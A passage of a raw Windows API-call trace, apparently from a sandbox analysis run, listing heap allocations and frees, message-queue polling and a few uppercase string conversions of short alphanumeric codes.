hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.369] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.370] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.370] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0199.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0199.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0199.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0199.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.372] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.373] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0199.373] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0199.373] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.376] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.377] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.377] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.377] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.377] HeapFree (in: hHeap=0x25c0000, 